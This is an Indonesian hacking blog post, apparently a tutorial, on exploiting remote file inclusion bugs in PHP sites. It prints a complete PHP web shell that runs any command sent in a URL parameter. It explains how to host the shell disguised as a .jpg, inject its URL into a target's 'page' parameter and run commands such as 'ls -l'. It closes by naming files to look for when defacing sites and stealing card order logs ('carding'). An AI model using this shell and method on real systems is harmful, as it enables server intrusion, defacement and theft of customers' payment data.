1. – Hosting file(Yg gratisan jg banyak. Contoh : Geocities , Ripway, dll)
Silahkan copy paste script berikut :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | <span style="font-family: verdana; font-size: xx-large;"><strong>CMD</strong> - SystemCommand</span><span style="font-family: Verdana; font-size: xx-small;"><strong>#</strong> CMD PHP :<strong>#</strong> Re-DESIGN by : <strong>Mygo-blackmygo.co.cc</strong><hr><pre><span style="font-family: Verdana; font-size: xx-small;">< ?// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )if (isset($chdir)) @chdir($chdir);ob_start();system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");$output = ob_get_contents();ob_end_clean();if (!empty($output)) echo str_replace(">", ">", str_replace("< ", "<",$output));?></span></pre><hr></span><span style="font-family: Verdana; font-size: xx-small;"><br><strong> Mygo-blackmygo.co.cc </strong><br><strong> Exclusif for HN community | www.blackmygo.co.cc</strong><p></p><p><strong>Join us at Hacker-Newbie.org</strong></p><p></p></span> |
http://www[dot]geocities/mygo/cmd.jpg
Setelah itu cari target (Ini membutuhkan kesabaran tingkat tinggi)
Setelah ketemu, contoh:
http://www[dot]target[dot]com/main.php?page=article
Nah, kamu ubah URL-nya jd
.http://www[dot]target[dot]com/main.php?page=http://www[dot]geocities/mygo/cmd.jpg&cmd=
Lalu eksekusi URL tsb! contoh:
.http://www[dot]target[dot]com/main.php?page=http://www[dot]geocities/mygo/cmd.jpg&cmd=ls -l
dan liat hasil-nya… browser akan menampilakan semua direktori yg ada di server sesuai perintah UNIX tadi (ls -l adalah perintah untuk melihat isi direktori beserta
permission-nya).
Untuk defacing atau carding, kamu bisa mengexplore lbh jauh lg…
Oke…oke… saya kasih kata kunci-nya:
1 2 | untuk deface = "index.html, index.php, index.htm"untuk carding = "orderlog.txt, order.php" |
so… Happy Hacking!
Sumber : N4is3n
No comments:
Post a Comment